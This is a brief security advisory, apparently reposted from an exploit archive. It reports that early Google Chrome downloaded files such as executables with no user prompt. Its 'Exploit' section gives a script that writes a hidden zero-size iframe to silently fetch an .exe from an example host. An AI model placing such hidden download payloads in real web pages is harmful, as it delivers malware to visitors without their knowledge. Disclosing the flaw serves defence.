|
|
| |
| Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt. |
| |
Credit:
The information has been provided by nerex.
The original article can be found at: http://www.milw0rm.com/exploits/6355
|
| |
Exploit:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
|
|
blog comments powered by
|